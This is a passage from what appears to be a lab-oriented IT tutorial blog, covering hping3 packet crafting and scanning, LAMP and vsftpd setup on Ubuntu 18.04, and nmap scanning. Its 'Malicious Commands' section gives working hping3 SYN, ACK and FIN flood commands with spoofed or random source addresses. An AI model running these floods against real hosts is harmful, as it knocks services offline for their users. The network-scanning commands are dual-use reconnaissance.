Use the -c option to decide on how many packets to send, in this example i am setting the count option to 5.

hping3 -A -c 5 192.168.100.11

HPING 192.168.100.11 (eth0 192.168.100.11): A set, 40 headers + 0 data bytes
len=46 ip=192.168.100.11 ttl=128 id=30010 sport=0 flags=R seq=0 win=32767 rtt=7.9 ms
len=46 ip=192.168.100.11 ttl=128 id=30011 sport=0 flags=R seq=1 win=32767 rtt=7.0 ms
len=46 ip=192.168.100.11 ttl=128 id=30012 sport=0 flags=R seq=2 win=32767 rtt=7.6 ms
len=46 ip=192.168.100.11 ttl=128 id=30013 sport=0 flags=R seq=3 win=32767 rtt=5.1 ms
len=46 ip=192.168.100.11 ttl=128 id=30014 sport=0 flags=R seq=4 win=32767 rtt=4.0 ms

--- 192.168.100.11 hping statistic ---
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 4.0/6.3/7.9 ms

Create a SYN packet and use the scan mode to scan port 1-1000 on a target.

hping3 -S -8 1-1000 192.168.100.11

Scanning 192.168.100.11 (192.168.100.11), port 1-1000
1000 ports to scan, use -V to see all the replies
+----+-----------+---------+---+-----+-----+-----+
|port| serv name |  flags  |ttl| id  | win | len |
+----+-----------+---------+---+-----+-----+-----+
   53 domain     : .S..A... 128 55677 64240    46
   88 kerberos   : .S..A... 128 55933 64240    46
  135 epmap      : .S..A... 128 56189 64240    46
  139 netbios-ssn: .S..A... 128 56445 64240    46
  389 ldap       : .S..A... 128 56701 64240    46
  445 microsoft-d: .S..A... 128 56957 64240    46
  464 kpasswd    : .S..A... 128 57213 64240    46
  593            : .S..A... 128 52863 64240    46
  636 ldaps      : .S..A... 128 53375 64240    46
All replies received. Done.
Not responding ports: (199 smux) (202 at-nbp) (203 ) (204 at-echo) (299 ) (300 ) (301 ) (306 ) (307 ) (308 ) (309 ) (312 ) (313 ) (407 ) (500 isakmp) (514 shell) (723 ) (729 ) (743 ) (761 ) (763 ) (764 ) (766 ) (767 ) (768 ) (769 ) (772 ) (782 ) (783 spamd) (784 ) (790 ) (791 ) (793 ) (794 ) (798 ) (799 ) (802 ) (803 ) (804 ) (805 ) (808 omirr) (809 ) (810 ) (811 ) (812 ) (813 ) (817 ) (818 ) (819 ) (820 ) (821 ) (822 ) (823 ) (824 ) (825 ) (827 ) (828 ) (829 ) (831 ) (832 ) (833 ) (834 ) (836 ) (837 ) (838 ) (839 ) (840 ) (841 ) (842 ) (843 ) (844 ) (845 ) (846 ) (847 ) (848 ) (849 ) (854 ) (855 ) (858 ) (878 ) (879 ) (880 ) (881 ) (911 ) (912 ) (913 ) (918 )
root@iPhone:~#

Send a UDP scan mode to send UDP request on port 80 to a target, if the UDP port is open then you will get a respond back, great to use when the target have blocked ICMP ping.

hping3 -2 192.168.100.17 -c 2 -p 80

Create a ping packet and use the ICMP mode.

hping3 -1 -c 4 192.168.100.11

HPING 192.168.100.11 (eth0 192.168.100.11): icmp mode set, 28 headers + 0 data bytes
len=46 ip=192.168.100.11 ttl=128 id=34163 icmp_seq=0 rtt=8.1 ms
len=46 ip=192.168.100.11 ttl=128 id=34164 icmp_seq=1 rtt=5.9 ms
len=46 ip=192.168.100.11 ttl=128 id=34167 icmp_seq=2 rtt=4.0 ms
len=46 ip=192.168.100.11 ttl=128 id=34168 icmp_seq=3 rtt=3.0 ms

--- 192.168.100.11 hping statistic ---
4 packets transmitted, 4 packets received, 0% packet loss
round-trip min/avg/max = 3.0/5.2/8.1 ms
root@iPhone:~#

Traceroute to a target using ICM mode and show verbose.

hping3 --traceroute -V -1 192.168.100.11

using eth0, addr: 172.168.200.110, MTU: 1500
HPING google.com (eth0 216.58.211.142): icmp mode set, 28 headers + 0 data bytes
hop=1 TTL 0 during transit from ip=172.168.200.2 name=_gateway
hop=1 hoprtt=3.9 ms
hop=2 TTL 0 during transit from ip=192.168.10.1 name=UNKNOWN
hop=2 hoprtt=2.0 ms
hop=3 TTL 0 during transit from ip=10.33.221.74 name=UNKNOWN
hop=3 hoprtt=8.9 ms
hop=4 TTL 0 during transit from ip=88.129.174.18 name=gbg1.dr8.a3network.se
hop=4 hoprtt=8.9 ms
hop=5 TTL 0 during transit from ip=88.129.128.62 name=gbg1.a7network.se
hop=5 hoprtt=8.0 ms
hop=6 TTL 0 during transit from ip=85.8.9.16 name=gbg1.cr1.a3network.se
hop=6 hoprtt=6.9 ms
hop=7 TTL 0 during transit from ip=85.8.10.20 name=sto2.cr1.a3network.se

Traceroute to determined if port 443 is open, set that local traffic is generated from source port 8080

hping3 --traceroute -V -S -p 443 -s 8080 google.com

using eth0, addr: 172.168.200.110, MTU: 1500
HPING google.com (eth0 216.58.211.142): S set, 40 headers + 0 data bytes
hop=1 TTL 0 during transit from ip=172.168.200.2 name=_gateway
hop=1 hoprtt=8.9 ms
len=46 ip=216.58.211.142 ttl=128 id=34374 tos=0 iplen=44
sport=443 flags=SA seq=8 win=64240 rtt=13.8 ms
seq=905581660 ack=1390210946 sum=3cce urp=0

len=46 ip=216.58.211.142 ttl=128 id=34376 tos=0 iplen=44
sport=443 flags=SA seq=9 win=64240 rtt=13.9 ms
seq=277232268 ack=486133387 sum=5a24 urp=0

len=46 ip=216.58.211.142 ttl=128 id=34377 tos=0 iplen=44
sport=443 flags=SA seq=10 win=64240 rtt=13.0 ms
seq=1939483389 ack=2029365982 sum=8498 urp=0

len=46 ip=216.58.211.142 ttl=128 id=34378 tos=0 iplen=44
sport=443 flags=SA seq=11 win=64240 rtt=12.9 ms
seq=90127368 ack=1561834414 sum=c208 urp=0

Use the TTL in tracerout to check load balancing devices IP address.

hping3 -S 192.168.100.100 -p 80 -T --ttl 13 --tr-keep-ttl -n 

Ping a subnet and don’t scan in order, instead randomize the scan. Use the –rand-dest and the interface -I eth0 operators.

hping3 -1 192.168.100.x --rand-dest -I eth0 

Send a ICMP packet to request a timestamp from a target, if the target have the ICMP responses blocked it wont respond to ICMP packets however it might allow response to timestamp request.

hping3 -1 192.168.100.17 --icmp-ts -c 3

Malicious Commands

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action, always perform the attacks on your own lab system.

Common used parameters.

  • The –flood parameter, activates the fastest packet sending mode
  • The -p “destport” parameter, specifies the destination port
  • The –spoof parameter, specifies which IP address to be spoofed
  • The -rand-source parameter, activates a random source address
  • The –interface parameter, used to specify interface

Main attack flags.

  • The -S parameter sets the SYN flag
  • The -A parameter sets the ACK flag
  • The -F parameter sets the FIN flag
  • The -R parameter sets the RESET flag
  • The -P parameter sets the PUSH flag
  • The -U parameter sets the URGENT flag

To start a SYN flood attack run the command bellow

NOTE: When running the commands hping3 will not show any output, it is working in the background.

hping3 --flood -p [DST_PORT] [VICTIM_IP] -S

Use hping3 to run a SYN flood attack with a inactive spoofed IP address from the network.

hping3 --flood -p [DST_PORT] [VICTIM_IP] -S --spoof [INACTIVE_IP]

SYN flood attack with with random source IP address.

hping3 --flood -p [DST_PORT] [VICTIM_IP] -S --rand-source

ACK flood attack.

hping3 --flood -p [DST_PORT] [VICTIM_IP] -A

FIN flood attack.

hping3 --flood -p [DST_PORT] [VICTIM_IP] -F

Conclusion

In this lab we have covered the basic commands you can do in hping3, we assembled TCP and UDP packets and used them to scan networks and discovered devices, as always when doing this kind of scans make sore you are authorized to scan the network and devices you are scanning.




How To Install Apache2 (LAMP) Ubuntu 18.04

How to install apache2 (LAMP) server

LAMP is a acronym of the names in the applications stack, Linux OS, Apache server, MySQL database and PHP programming language.

Together they build a framework to run web applications and host sites like WordPress , all applications in the stack are open source and released on most Linux distributions.

Requirements

  1. Ubuntu 18.04 LTS
  2. SSH access to the server (Setup SSH)
  3. A non root user with sudo privileges (Add sudo user)
  4. Enabled firewall (Setup ufw)
  5. Configured hostname (Setup hostname)
  6. DNS entries

Step 1: Install Apache2

1.1 Lets start by updating the repository’s and software packages.

sudo apt update 
sudo apt upgrade -y

1.2 Install the apache2 package.

sudo apt install apache2 -y

1.3 Confirm installation.

sudo systemctl status apache2

● apache2.service - The Apache HTTP Server
   Loaded: loaded (/lib/systemd/system/apache2.service; enabled; vendor preset:
  Drop-In: /lib/systemd/system/apache2.service.d
           └─apache2-systemd.conf
   Active: active (running) since Wed 2019-06-19 19:08:58 UTC; 3min 21s ago
 Main PID: 7685 (apache2)
    Tasks: 55 (limit: 2213)
   CGroup: /system.slice/apache2.service
           ├─7685 /usr/sbin/apache2 -k start
           ├─7878 /usr/sbin/apache2 -k start
           └─7879 /usr/sbin/apache2 -k start

Jun 19 19:08:48 iphone systemd[1]: Starting The Apache HTTP Server...
Jun 19 19:08:58 iphone apachectl[7660]: AH00558: apache2: Could not reliably det
Jun 19 19:08:58 iphone systemd[1]: Started The Apache HTTP Server.

toor@iphone:~$

Step 2: Configure Firewall

2.1 Add firewall rules for Apache.

sudo ufw allow in "Apache Full"

Rule added
Rule added (v6)
toor@iphone:~$

2.2 Display firewall rules and confirm that the firewall is configured

sudo ufw status

Status: active

To                         Action      From
--                         ------      ----
22/tcp                     ALLOW       Anywhere
OpenSSH                    ALLOW       Anywhere
21/tcp                     ALLOW       Anywhere
40000:50000/tcp            ALLOW       Anywhere
990/tcp                    ALLOW       Anywhere
Apache Full                ALLOW       Anywhere
22/tcp (v6)                ALLOW       Anywhere (v6)
OpenSSH (v6)               ALLOW       Anywhere (v6)
21/tcp (v6)                ALLOW       Anywhere (v6)
40000:50000/tcp (v6)       ALLOW       Anywhere (v6)
990/tcp (v6)               ALLOW       Anywhere (v6)
Apache Full (v6)           ALLOW       Anywhere (v6)

toor@iphone:~$

2.3 Confirm that you can browse to the site

http://your_server_ip

Step 3: Create the Directory Structure

3.1 Virtual host enables us to have multiple websites on one server, each website can have its own home folder “document root” and a unique SSL certificate ,we can have different security policies for each site, and much more.

Create the directory structure.

/var/www/
├── Domain-1.local
│ └── html
├── Domain-2.local
│ └── html

Before we create the directory for the site, make sure to configure hostname and hosts file.

I will create a website for my local lab domain ceh.local, the /etc/hots file should the the fallowing entry in it.

YOUR-IP-ADDRESS ceh.local

In this example i am creating a virtual hosts directory called “ceh.local” and i am using the -p flag to create parent directories.

sudo mkdir -p /var/www/ceh.local/html

3.2 Assign ownership of the directory to current user

sudo chown -R $USER:$USER /var/www/ceh.local/html

3.3 Set directory permissions

sudo chmod -R 755 /var/www/ceh.local/html

3.4 Create a sample index.html file using your favorite editor and add it to the root directory.

sudo nano /var/www/ceh.local/html/index.html

Add the html code bellow

<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
    <title>Welcome to ceh.local</title>
  </head>
  <body>
    <h1>Success! ceh.local home page</h1>
  </body>
</html>

Exit & Save

Step 4: Configure Virtual Hosts File

Apache virtual hosts configuration files are stored in.

  • /etc/apache2/sites-enabled
  • /etc/apache2/sites-available

Lets add a Virtual Hosts configuration file for domain1.local

sudo nano /etc/apache2/sites-available/ceh.local.conf

Add the fallowing lines and modify them to your site.

<VirtualHost *:80>
    ServerName ceh.local
    ServerAlias www.ceh.local
    ServerAdmin admin@ceh.local
    DocumentRoot /var/www/ceh.local/html

    <Directory /var/www/ceh.local/html>
        Options -Indexes +FollowSymLinks
        AllowOverride All
    </Directory>

    ErrorLog ${APACHE_LOG_DIR}/ceh.local-error.log
    CustomLog ${APACHE_LOG_DIR}/ceh.local-access.log combined
</VirtualHost>

Exit & Save

4.2 Enable the Virtual Hosts configuration file file with a2ensite

sudo a2ensite ceh.local.conf

Enabling site domain1.local.
To activate the new configuration, you need to run:
  systemctl reload apache2
toor@iphone:~$

4.3 Disable the default site defined in 000-default.conf

sudo a2dissite 000-default.conf

Site 000-default disabled.
To activate the new configuration, you need to run:
  systemctl reload apache2
toor@iphone:~$

4.4 Test the configuration file for any syntax errors

sudo apache2ctl configtest

Syntax OK
toor@iphone:/var/www/domain1.local/html$

4.5 Restart the Apache service for the changes to take effect

sudo systemctl restart apache2

4.6 Confirm that the service have started

sudo systemctl status apache2

4.7 launch a web browser and start browsing ceh.local

Step 5: Install MySQL

 5.1 To install MySQL run

sudo apt install mysql-server -y

5.2 Verify that MySQL service is running

sudo systemctl status mysql

● mysql.service - MySQL Community Server
   Loaded: loaded (/lib/systemd/system/mysql.service; enabled; vendor preset: en
   Active: active (running) since Fri 2019-06-21 11:59:29 UTC; 8s ago
 Main PID: 17807 (mysqld)
    Tasks: 27 (limit: 2322)
   CGroup: /system.slice/mysql.service
           └─17807 /usr/sbin/mysqld --daemonize --pid-file=/run/mysqld/mysqld.pi

Jun 21 11:59:28 srv6 systemd[1]: Starting MySQL Community Server...
Jun 21 11:59:29 srv6 systemd[1]: Started MySQL Community Server.
lines 1-10/10 (END)
toor@srv6:~$

5.3 The default MySQL user “root” have a blank password., we need to secure the MySQL server and remove the default database.

sudo mysql_secure_installation

Then enter the following security questions

  • VALIDATE PASSWORD plugin = NO
  • Set root password and confirm
  • Remove anonymous users? = YES
  • Disallow root login remotely? = NO
  • Remove test database and access to it? = YES
  • Reload privilege tables now? = YES

5.4 Start from MySQL Server 5.7, if you do not provide a password to root user during the installation, it will use auth_socket plugin for authentication.

If we want to configure a password authentication, we need to run the following commands.

sudo mysql

5.5 Display current configuration

SELECT user,authentication_string,plugin,host FROM mysql.user;

5.6 Alter authentication_string for the root user

ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'changeme';

5.7 Flush the privileges and update the changes

FLUSH PRIVILEGES;

5.8 Display current configuration

SELECT user,authentication_string,plugin,host FROM mysql.user;

5.9 Exit from the mysql prompt:

exit

Step 6: Install PHP

6.1 PHP is a server side scripting language used to generate dynamic content on websites and applications.

Install PHP (default version is PHP 7.2) and some of the basic modules for web deployments.

sudo apt install php php-common php-mysql php-gd php-cli -y

6.2 Create info.php file in the Apache root document folder.

Usually, the apache2 root document folder will be /var/www/html/ or /var/www/ in most Debian based Linux distributions.

If you have followed the guide then the the file should be in /var/www/ceh.local/html/

sudo nano /var/www/ceh.local/html/info.php

Add the following lines

<?php
phpinfo();
?>

Exit and save

6.3 Restart Apache

sudo systemctl restart apache2

6.4 Test PHP page, open a web browser and enter “http://ceh.local/info.php”

Step 7: Install PhpMyAdmin

7.1 With phpMyAdmin we can administrating MySQL from a web browser, start by adding the needed repository.

sudo add-apt-repository universe

7.2 Install phpmyadmin

sudo apt install phpmyadmin -y

Go through the package installation process, select Apache2 and configure a password for the phpmyadmin database.

7.3 Restart Apache

sudo systemctl restart apache2

Conclusion

We have installed installing Apache2, MySQL, PHP and Virtual Hosts on a Ubuntu server and secured it.

For administration of the website we have installed phpmyadmin.




How To Install a FTP Server On Ubuntu Server 18.04

VsFTPD ” Very Secure FTP Daemon”

VsFTPD “very secure FTP daemon” is an open source FTP server for Linux systems, in this quick guide we will install VsFTPD on a Ubuntu server and secure the FTP server with SSL/TLS. Please visit the official website of VsFTPD if you need more information about the application.

Requirements

  • Ubuntu Server 18.04
  • User with sudo privileges.
  • Static IP address
  • Configured firewall
  • Server connected to internet

For more information on how to create a sudo and configure a static IP please see the quick guides Create Sudo User , Set Static IP address and Configure Ubuntu Firewall.

Install VsFTPD

Vsftpd is available in Ubuntu 18.04 default repository and do not require any extra pre configuration.

Run the following command to install Vsftpd

sudo apt-get install vsftpd -y

Wait for the application to finish installing, start the Vsftpd service and enable it to start on boot.

sudo systemctl start vsftpd
sudo systemctl enable vsftpd

Verify that the VsFTPD is up and running.

sudo systemctl status vsftpd

root@iphone:~# sudo systemctl status vsftpd
● vsftpd.service - vsftpd FTP server
   Loaded: loaded (/lib/systemd/system/vsftpd.service; enabled; vendor preset: enabled)
   Active: active (running) since Sat 2019-06-08 18:17:39 UTC; 2min 54s ago
 Main PID: 2311 (vsftpd)
    Tasks: 1 (limit: 2214)
   CGroup: /system.slice/vsftpd.service

Jun 08 18:17:39 iphone systemd[1]: Starting vsftpd FTP server...
Jun 08 18:17:39 iphone systemd[1]: Started vsftpd FTP server.

Configure The Firewall

We need to open port 20 and 21 for active FTP and ports 40000-50000 for passive FTP.

sudo ufw allow 20/tcp

sudo ufw allow 21/tcp

sudo ufw allow 40000:50000/tcp

Display the firewall rules.

sudo ufw status

root@iphone:~# sudo ufw status
Status: active

To                         Action      From
--                         ------      ----
22/tcp                     ALLOW       Anywhere
OpenSSH                    ALLOW       Anywhere
21/tcp                     ALLOW       Anywhere
40000:50000/tcp            ALLOW       Anywhere
22/tcp (v6)                ALLOW       Anywhere (v6)
OpenSSH (v6)               ALLOW       Anywhere (v6)
21/tcp (v6)                ALLOW       Anywhere (v6)
40000:50000/tcp (v6)       ALLOW       Anywhere (v6)

root@iphone:~#

Create FTP User

Create a low privileges user that can be used to access the FTP server.

When prompted enter password and user information for the user.

sudo adduser ftpuser

root@iphone:~# sudo adduser ftpuser
Adding user `ftpuser' ...
Adding new group `ftpuser' (1001) ...
Adding new user `ftpuser' (1001) with group `ftpuser' ...
Creating home directory `/home/ftpuser' ...
Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for ftpuser
Enter the new value, or press ENTER for the default
        Full Name []:
        Room Number []:
        Work Phone []:
        Home Phone []:
        Other []:
Is the information correct? [Y/n] y
root@iphone:~#

Create a FTP Directory For The FTP User

First we want to create a FTP folder for the ftpuser.

sudo mkdir /home/ftpuser/ftp

Next we want to set the folder ownership.

sudo chown nobody:nogroup /home/ftpuser/ftp

Remove write permissions to the ftp folder.

sudo chmod a-w /home/ftpuser/ftp

Verify FTP folder permissions.

sudo ls -la /home/ftpuser/ftp

root@iphone:/home/ftpuser# sudo ls -la /home/ftpuser/ftp
total 8
dr-xr-xr-x 2 nobody  nogroup 4096 Jun  8 19:01 .
drwxr-xr-x 3 ftpuser ftpuser 4096 Jun  8 19:02 ..
root@iphone:/home/ftpuser#

Create a directory for file uploads and assign ownership to ftpuser.

sudo mkdir /home/ftpuser/ftp/files
sudo chown ftpuser:ftpuser /home/ftpuser/ftp/files

Verify the new folder permission.

sudo ls -la /home/ftpuser/ftp

root@iphone:/home/ftpuser/ftp/files# sudo ls -la /home/ftpuser/ftp
total 12
dr-xr-xr-x 3 nobody  nogroup 4096 Jun  8 19:08 .
drwxr-xr-x 3 ftpuser ftpuser 4096 Jun  8 19:02 ..
drwxr-xr-x 2 ftpuser ftpuser 4096 Jun  8 19:08 files
root@iphone:/home/ftpuser/ftp/files#

Create and add txt file to the files folder we created in the step above.

echo "Test create txt file" | sudo tee /home/ftpuser/ftp/files/txt01.txt

Configuring VsFTPD

Edit the VsFTPD configuration file vsftpd.conf

cd etc/
sudo nano vsftpd.conf

##
# Allow anonymous FTP? (Disabled by default).
anonymous_enable=NO
#
# Uncomment this to allow local users to log in.
local_enable=YES
##

Enable uploading to the FTP server by uncomment the write_enable parameter.

##
write_enable=YES
##

Prevent the FTP users from accessing files or to run commands outside there directory by uncomment the chroot_local_user=YES parameter.

##
chroot_local_user=YES
##

Scroll down to the bottom and add the the port range for passive FTP.

pasv_min_port=40000
pasv_max_port=50000

Previously we created a ftp/file directory and folder for the ftpsuser, now we need to configure VsFTPD to log the ftpuser to home ftp directory we created.

Add the line bellow.

user_sub_token=$USER
local_root=/home/$USER/ftp

Restart the daemon.

sudo systemctl restart vsftpd

Testing The FTP Access

You can use a ftp client like FileZilla or the command line to confirm that you can access the ftp server and that you can see the txt file you created in the ftpuser ftp directory.

I am using the command line on the FTP server in this example to confirm that i can access the FTP and that i can download the txt01.txt.

root@iphone:/# ftp 127.0.0.1
Connected to 127.0.0.1.
220 (vsFTPd 3.0.3)
Name (127.0.0.1:toor): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

Lets confirm that we can change to the “files” directory.

ls
cd files

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 1001     1001         4096 Jun 08 19:17 files
226 Directory send OK.
ftp> cd files
250 Directory successfully changed.
ftp>

List the directory and use the get command to transfer the test file.

ls
get txt01.txt

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0              21 Jun 08 19:16 txt01.txt
226 Directory send OK.
ftp> get txt01.txt
local: txt01.txt remote: txt01.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for txt01.txt (21 bytes).
226 Transfer complete.
21 bytes received in 0.00 secs (259.5926 kB/s)
ftp>

Upload the file with a new name to test users write permissions. To upload a file we use the put command.

put txt01.txt txt01-upload.txt

ftp> put txt01.txt txt01-upload.txt
local: txt01.txt remote: txt01-upload.txt
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
21 bytes sent in 0.00 secs (1.0541 MB/s)
ftp>

Listing the files directory should show two files now.

ls

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-------    1 1001     1001           21 Jun 08 21:00 txt01-upload.txt
-rw-r--r--    1 0        0              21 Jun 08 19:16 txt01.txt
226 Directory send OK.
ftp>

(Optional) Secure The FTP Server With TLS

Lets start adding the firewall rule for TLS traffic, add port 990 to the firewall access list.

sudo ufw allow 990/tcp

root@iphone:/# sudo ufw allow 990/tcp
Rule added
Rule added (v6)
root@iphone:/#

Confirm firewall status

sudo ufw status

root@iphone:/# sudo ufw status
Status: active

To                         Action      From
--                         ------      ----
22/tcp                     ALLOW       Anywhere
OpenSSH                    ALLOW       Anywhere
21/tcp                     ALLOW       Anywhere
40000:50000/tcp            ALLOW       Anywhere
990/tcp                    ALLOW       Anywhere
22/tcp (v6)                ALLOW       Anywhere (v6)
OpenSSH (v6)               ALLOW       Anywhere (v6)
21/tcp (v6)                ALLOW       Anywhere (v6)
40000:50000/tcp (v6)       ALLOW       Anywhere (v6)
990/tcp (v6)               ALLOW       Anywhere (v6)

root@iphone:/#

Create a OpenSSL certificate

Create a OpenSSL certificate for TLS/SSL encryption, first make a directory where you can save the certificate.

sudo mkdir /etc/ftpcert

Now we will create a new certificate, use the -days flag to make it valid for two years, 730 days. Next set the bit value of the RSA key, i am running with a 2048-bit RSA key.

Type in the -keyout and the -out flag, the flags will set the key values for the private key and the certificate.

NOTE: Setting both flags with the same value will create both the private key and the certificate in the same file.

You will be asked to enter details like country, state, etc. You don’t have to fill in the information. Just keep pressing ENTER for defaults.

sudo openssl req -x509 -nodes -days 730 -newkey rsa:2048 -keyout /etc/ftpcert/vsftpd.pem -out /etc/ftpcert/vsftpd.pem

Confirm that the private key and the certificate is the ftpscert directory.

root@iphone:/# cd /etc/ftpcert/
root@iphone:/etc/ftpcert# ls
vsftpd.pem
root@iphone:/etc/ftpcert#

Next we need to configure vsftpd to allow TLS/SSL traffic and point out the directory of the private key and the certificate , open the vsftpd configuration file with a editor.

cd etc/
sudo nano vsftpd.conf

Scroll down until you find the rsa parameters, Comment them out and replace them with new lines that points out the privet key and the certificate we created.

##
# rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
# rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
##

rsa_cert_file=/etc/ftpcert/vsftpd.pem
rsa_private_key_file=/etc/ftpcert/vsftpd.pem

Configure FTP connections to use use SSL/TLS, change the ssl_enable=NO parameter to YES.

##
ssl_enable=YES
##

Now add the following lines to deny anonymous connections over SSL and to require SSL for logging and transferring data.

##
allow_anon_ssl=NO
force_local_data_ssl=YES
force_local_logins_ssl=YES
##

Configure the server to use the TLS protocol

##
ssl_tlsv1=YES
ssl_sslv2=NO
ssl_sslv3=NO
##

Last configure SSL reuse parameter to NO due that it can have conflicts with FTP clients, next we need to use high encryption cipher suite, which means that the key lengths is equal to or greater than 128 bits.

Paste thee lines below.

##
require_ssl_reuse=NO
ssl_ciphers=HIGH
##

The configuration should have the below entry’s configured.

#
rsa_cert_file=/etc/ftpcert/vsftpd.pem
rsa_private_key_file=/etc/ftpcert/vsftpd.pem
#
#
ssl_enable=YES
#
allow_anon_ssl=NO
force_local_data_ssl=YES
force_local_logins_ssl=YES
##
ssl_tlsv1=YES
ssl_sslv2=NO
ssl_sslv3=NO
#
require_ssl_reuse=NO
ssl_ciphers=HIGH
#

Restart the VsFTPD to load the new configuration.

sudo systemctl restart vsftpd

Confirm FTP TLS Configuration

Download a FTP client like FileZilla, you grab the FileZilla client from the official site https://filezilla-project.org/

Run and install the FTP client, when connecting to the FTP server use “Require explicit FTP over TLS”. If everything is configured correct you should be grated with a pop up windows that displays the server certificate we created.

If you try to connect to the FTP server with just plain FTP protocol, you will get an error and you wont be able to connect to the server.

Status:	Connection established, waiting for welcome message...
Response:	220 (vsFTPd 3.0.3)
Command:	USER ftpuser
Response:	530 Non-anonymous sessions must use encryption.
Error:	Could not connect to server

Conclusion

In this quick guide we have installed a FTP server on Ubuntu18.04.02, generated a certificate with OpenSSL and secured the server connectivity with TLS.




How To Scan a Network With Nmap

How To Scan With Nmap

Nmap is a great tool to learn, the application have the ability to scan and map networks and much more, it is a great tool for everybody that works in IT.

It is the first tool i use when i want troubleshot, we can do regular ping or a ping sweeps that scans a range of the subnet or the whole subnet.

The application also offers host discovery, port discovery, operating system version discovery, MAC address, services, exploit and vulnerability detection.

Another great tool to use while learning nmap is Wireshark, It is highly recommended to run Wireshark wile using nmap, following the flow of network traffic will help you analyze and visuals the scans.

We will try some of the popular scanning method that can be used with nmap.

This guide is just meant to give you high level understanding on how to use the different scanning techniques.

Please don’t scan networks or host you are not authorized to do. The networks and hosts scanned in the guide is my home lab.

If you want a more in-depth explanation on how you can use nmap and the switches, i recommend that you read The Official Nmap Project Guide to Network Discovery and Security Scanning”.

Save Output To Txt/Xml File

Description Command Example
Save output to file nmap -oN [file.txt] [Target] nmap -oN file.txt 192.168.100.11
Save output as XML nmap -oX [file.xml] [Target] nmap -oX file.xml192.168.100.11
Save in all formats nmap -oA [file] [Target] nmap -oA file 192.168.100.11

Basic Scanning

Description Command Example
Scan a single host nmap [Target] nmap 192.168.100.100
Scan multiple targets nmap [Target1, Target2] nmap 192.168.100.10,192.168.100.100
Scan a range of IP address nmap [IP Range] nmap 192.168.100.10-99
Scan a Class C subnet nmap [IP/CDIR] nmap 192.168.100.0/24
Resolve FQDN nmap [FQDN] nmap www.eaxmple.com

Quick Scans

Description Command Example
Ping scan nmap -sP [Target] nmap -sP 192.168.100.11
Ping Scan – disable port scanining nmap -sn [Target] nmap -sn 192.168.100.0/24

-sP switch can be used when you want to make a quick ping, the host or hosts will replay to ICMP ping packets.

nmap -sP 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-26 21:05 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.0010s latency).
Nmap done: 1 IP address (1 host up) scanned in 5.84 seconds

The -sn switch is used to to sweep a network without doing any port scans.

nmap -sn 192.168.100.0/24

Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-02 00:02 W. Europe Daylight Time
Nmap scan report for 192.168.100.1
Host is up (0.0010s latency).
Nmap scan report for srv1.online-it.nu (192.168.100.11)
Host is up (0.0020s latency).
Nmap scan report for 192.168.100.13
Host is up (0.0010s latency).
Nmap scan report for srv7.home.local (192.168.100.17)
Host is up (0.0011s latency).
Nmap scan report for 192.168.100.100
Host is up (0.0013s latency).
Nmap done: 256 IP addresses (5 hosts up) scanned in 10.82 seconds

Banner Grabbing & Service Detection

Description Command Example
Detect OS nmap -O [Target] nmap -O 192.168.100.11
Detect OS & Services nmap -A [Target] nmap -A 192.168.100.11
Detect Services nmap -sV [Target] nmap -sV 192.168.100.11

The -O switch scans for operating system details. This type of scan can be used to identify the operating system of the scanned host and the services the host is running.

nmap -O 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-26 21:12 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.00032s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server
Device type: general purpose
Running: Microsoft Windows 2016
OS CPE: cpe:/o:microsoft:windows_server_2016
OS details: Microsoft Windows Server 2016 build 10586 - 14393
Network Distance: 2 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.96 seconds

Port Scans Types

Description Command Example
Scan a single Port nmap -p [Port] [Target] nmap -p 80 192.168.100.11
Scan a range of ports nmap -p [Port-Port] [Target] nmap -p 20-99 192.168.100.11
Scan the first 100 ports nmap -F [Port] [Target] nmap -F 192.168.100.11
Scan using TCP Handshake nmap -sT [Target] nmap -sT 192.168.100.11
Scan using TCP SYN (Stealth) nmap -sS [Target] nmap -sS 192.168.100.11
Scan UDP port nmap -sU [Target] nmap -sU 192.168.100.11

The -sT switch creates a full TCP handshake with the target. This is considered more accurate than SYN scan but is slower and can be easy detected by firewalls and IDS.

nmap -sT 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-26 21:18 W. Europe Daylight Time

Nmap scan report for 192.168.100.11
Host is up (1.0s latency).
Not shown: 986 closed ports
PORT     STATE    SERVICE
25/tcp   filtered smtp
53/tcp   open     domain
88/tcp   open     kerberos-sec
110/tcp  filtered pop3
135/tcp  open     msrpc
139/tcp  open     netbios-ssn
389/tcp  open     ldap
445/tcp  open     microsoft-ds
464/tcp  open     kpasswd5
593/tcp  open     http-rpc-epmap
636/tcp  open     ldapssl
3268/tcp open     globalcatLDAP
3269/tcp open     globalcatLDAPssl
3389/tcp open     ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 219.83 seconds

